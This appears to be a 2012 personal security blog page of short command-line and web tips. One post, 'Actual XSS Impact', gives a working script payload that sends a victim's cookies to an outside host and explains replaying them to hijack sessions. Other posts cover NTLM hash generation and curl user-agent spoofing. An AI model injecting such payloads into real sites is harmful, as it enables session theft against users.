If you come across a machine or web app that has nmap with the suid bit set, then the following article will be of interest to you:
http://synfin.net/papers/nmap-suid.txt
Tuesday, October 23, 2012
Friday, October 19, 2012
Mount NTFS ISOs in linux
http://wiki.edseek.com/guide:mount_loopback#accessing_specific_partitions_in_the_image
watch ALL the things
So i'm waiting for a drive to clone and i like to see both the byte size AND the human readable byte size. I know you watch repeating command using "watch" dur...but two commands at once?
Its actually much simpler than it sounds. All watch does is pass the arguments to 'sh -c'. So, it follows that the following line must work:
and yes, it does. All you need to do is escape the command terminator ';' so it will be passed as an argument.
now to watch paint dry...
Its actually much simpler than it sounds. All watch does is pass the arguments to 'sh -c'. So, it follows that the following line must work:
watch ls -l file \; ls -lh file
and yes, it does. All you need to do is escape the command terminator ';' so it will be passed as an argument.
now to watch paint dry...
Wednesday, October 17, 2012
OSX Alert Boxes
Found this on a stackoverflow post, apparently running the following line pops up a box with the specified text:
osascript -e 'tell app "System Events" to display dialog "ZOMGLULZ"'
Monday, October 8, 2012
Actual XSS Impact
Popping up alert boxes as a PoC for XSS is cute and all, but sometimes you want to see the actual attack. The following javascript line will make a GET request to example.com/wut.gif and append the document.cookie to the request. You then log into that server, read your apache logs, and you have the cookies for that user. Replace your browser's cookies with the captured ones and, depending on the site, you could log in as them.
This is an actual attackers line, dont be stupid.
<script>a = new Image(); a.src = "http://example.com/wut.gif?" + document.cookie + "end"; </script>
Labels:
Web
Generate NTLM hashes via command line
Turns out the NTLM hashing algo is super simple. It just takes the string you give it, converts it to UTF-16LE and then outputs the md4 of that. You can generate your own fairly simply at the command line:
What this does is use a fairly popular unix utility "iconv". -f is the "from" encoding, which is this case is just simple ASCII and sets to "to" encoding using -t. It reads in the string using printf and pipes that to openssl for the digest. the result is the NT hash of the string (or password if you want to look at it like that) "lolwut"
create a function and place it in .bashrc:
now just type "ntlm_hash lolwut" to get the same result.
iconv -f ASCII -t UTF-16LE <(printf "lolwut") | openssl dgst -md4
$iconv -f ASCII -t UTF-16LE <(printf "lolwut") | openssl dgst -md4 dcc1ed89d1d080ef47dccf3e59a50d45
ntlm_hash () { iconv -f ASCII -t UTF-16LE <(printf "$1") | openssl dgst -md4 }
Labels:
Bash,
OSX,
Password Cracking,
Windows
Stealth cURL
I use curl all the time, almost every day. Unfortunately curl thinks its a good idea to use their own user agent string when grabbing content from sites. This has the problem because sometimes devs code in exceptions for different browsers, so the page you get back for internet explorer is different than the one you get for firefox. Luckily, the curl devs included the ability to change your user agent string to whatever you want.
normally curl's agent string is this: (curl from my macbook)
User-Agent: curl/7.24.0 (x86_64-apple-darwin12.0) libcurl/7.24.0 OpenSSL/0.9.8r zlib/1.2.5
That is grabbed directly from the header that is sent to the server (captured using netcat). As you can see its fairly obvious that the person is on mac and they are using curl. To change this user agent agent so it appears as if firefox is grabbing it, we use the -A option. First we grab the valid user agent string we decide to use from http://www.useragentstring.com/. In this case i'm going to use the latest firefox one, the command line is as follows:
Now if you look at your logs, you will see the user-agent string will reflect the new string.
Note:
curl supports config files using -K, so you can just place it in a file along with whatever else you want to use and reference the config files, a nice example is in the man page.
normally curl's agent string is this: (curl from my macbook)
User-Agent: curl/7.24.0 (x86_64-apple-darwin12.0) libcurl/7.24.0 OpenSSL/0.9.8r zlib/1.2.5
That is grabbed directly from the header that is sent to the server (captured using netcat). As you can see its fairly obvious that the person is on mac and they are using curl. To change this user agent agent so it appears as if firefox is grabbing it, we use the -A option. First we grab the valid user agent string we decide to use from http://www.useragentstring.com/. In this case i'm going to use the latest firefox one, the command line is as follows:
curl -A 'Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2' example.com
Note:
curl supports config files using -K, so you can just place it in a file along with whatever else you want to use and reference the config files, a nice example is in the man page.
Wednesday, October 3, 2012
Regex for PHP serialized data
This is the regex string to use when searching through a document for serialized data.
/^(i|s|a|o|d)(.*);/si
I got it from here: http://regex-test.com/library/entry/check_if_serialized/16
/^(i|s|a|o|d)(.*);/si
I got it from here: http://regex-test.com/library/entry/check_if_serialized/16
Labels:
Programming,
Web
Subscribe to:
Posts (Atom)